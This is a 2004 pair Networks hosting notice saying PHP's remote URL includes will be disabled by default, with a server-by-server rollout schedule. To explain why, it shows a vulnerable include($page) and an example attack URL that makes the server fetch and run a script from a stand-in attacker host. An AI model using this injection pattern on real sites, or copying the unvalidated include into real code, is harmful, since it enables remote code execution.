PHP Configuration Change
updated July 7, 2004
We will be making a change to our default PHP configuration starting on
July 1, 2004. This change will not remove any functionality, but will turn
off by default a feature that is infrequently used but the focus of many
attacks.
PHP has the ability to read pages given as URLs for use within PHP code.
For instance, the PHP code:
<?php include("http://www.example.com/script.php"); ?>
can be used to download and include the code at that URL. When used as
intended, this can be very convenient.
However, when combined with code that uses a variable in an include()
statement without validating its contents, it can be exploited by a
malicious user to run arbitrary code.
Imagine a page that uses this code:
<?php include($page); ?>
which is called in this manner:
http://example.com/script.php?page=http://attack.example.com/badscript.php
Without proper input checking, the remote script will be included and
executed, running whatever commands the attacker chooses as the web server
user.
Thousands of our customers are using PHP software packages (both open-source
and commercial) which do not perform proper input checking. As a result, we
see 5-10 successful attacks each week exploiting these vulnerabilities.
For this reason, we will be changing our configuration to disallow loading
of URLs via include(), require(), file(), and similar routines. The majority
of our users are not actively using this feature, and need do nothing at all.
If you are taking advantage of this feature, you can turn it on for your
account by adding the following configuration line to your .htaccess file:
php_flag allow_url_fopen on
UPDATE: If you are using php4.cgi in conjunction with php-cgiwrap, a different change
is required. You should copy /usr/local/etc/php.ini to the same directory
as your copy of php4.cgi, and remove the line that references allow_url_fopen
from the file entirely.
Please note that this only affects attempts to load URLs via these functions.
It has no affect on loading files from the server itself.
We will be making this change in batches of servers, to better support any
user who experiences problems, in accordance with the following schedule:
Mon July 5, 2004: www1 - www100
Tue July 6, 2004: www101 - www200
Wed July 7, 2004: www201 - www300
Thu July 8, 2004: www301 - www370 & Quickserves
pair Networks appreciates your business! We are striving to provide the best possible Web hosting.
